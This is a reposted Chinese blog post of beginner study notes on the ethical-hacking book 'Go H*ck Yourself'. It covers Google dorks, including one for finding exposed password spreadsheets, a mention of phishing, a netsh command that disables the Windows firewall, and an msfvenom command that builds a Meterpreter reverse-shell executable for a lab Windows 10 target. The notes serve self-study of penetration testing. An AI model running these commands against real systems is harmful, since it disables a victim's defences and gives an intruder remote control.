0


GO H*CK YOURSELF:新知识点的记录(1)截至第6章

术语:ONLINE RECONNAISSANCE(在线侦察)

高级搜索技巧:

For example, the operator

ext:

searches for specific file extensions, or the filename endings for different types of files. Examples include docx for Microsoft Word documents, txt for plaintext, pdf for PDF files, xlsx for Microsoft Excel spreadsheets, and so on. The operator

site:

searches for results on specific sites; you might search for

site:nostarch.com

or

site:

yourcompany.com.

Finding Passwords with the ext: Operator

type

ext:xls password

推荐一个网站:

VirusTotal - Homehttps://www.virustotal.com/gui/home/upload

Analyze suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community

Google Hacking Database

Google Hacking Database (GHDB) - Google Dorks, OSINT, Recon (exploit-db.com)https://www.exploit-db.com/google-hacking-database


SOCIAL ENGINEERING AND PHISHING ATTACKS

伪造网站,窃取密码


命令行关闭防火墙:netsh一个重要的命令

netsh advfirewall set allprofiles state off

Kali渗透Windows10

思路比较传统:msf监听,生成shellcode,上传到win10(要关闭防火墙),执行后反射

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.4 -f exe -o shellcode.exe

深度渗透meterpreter:

标签: golang p2p linq

本文转载自: https://blog.csdn.net/lm19770429/article/details/122909682
版权归原作者 花纵酒 所有, 如有侵权,请联系我们删除。

“GO H*CK YOURSELF:新知识点的记录(1)截至第6章”的评论:

还没有评论